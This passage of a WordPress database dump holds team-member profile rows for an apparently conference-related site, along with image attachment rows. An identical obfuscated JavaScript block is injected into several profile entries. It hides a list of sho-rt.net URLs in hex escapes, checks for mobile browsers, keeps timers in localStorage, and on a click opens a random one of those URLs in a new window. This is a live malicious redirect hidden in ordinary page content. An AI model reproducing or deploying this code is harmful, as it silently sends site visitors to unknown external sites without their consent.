c38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Paul Vincent Kuper','','publish','open','closed','','paul-vincent-kuper','','','2022-11-04 20:14:00','2022-11-04 20:14:00','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2978',0,'dt_team','',0),
(2979,1,'2022-11-04 20:13:43','2022-11-04 20:13:43','','ws184','','inherit','open','closed','','ws184','','','2022-11-04 20:13:43','2022-11-04 20:13:43','',2978,'https://gsw2023.com/wp-content/uploads/2022/11/ws184.jpg',0,'attachment','image/jpeg',0),
(2980,1,'2022-11-04 20:15:28','2022-11-04 20:15:28','<!-- wp:paragraph -->\n<p>Dubai Municipality, UNITED ARAB EMIRATES</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(ICWG III/IVb)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Hussein M. Abdulmuttalib</strong>','','publish','open','closed','','hussein-m-abdulmuttalib','','','2022-11-04 20:15:30','2022-11-04 20:15:30','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2980',0,'dt_team','',0),
(2981,1,'2022-11-04 20:14:54','2022-11-04 20:14:54','','ws185','','inherit','open','closed','','ws185','','','2022-11-04 20:14:54','2022-11-04 20:14:54','',2980,'https://gsw2023.com/wp-content/uploads/2022/11/ws185.jpg',0,'attachment','image/jpeg',0),
(2982,1,'2022-11-04 20:18:30','2022-11-04 20:18:30','<!-- wp:paragraph -->\n<p>Paris Lodron University Salzburg, AUSTRIA</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>(ICWG III/IVb)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 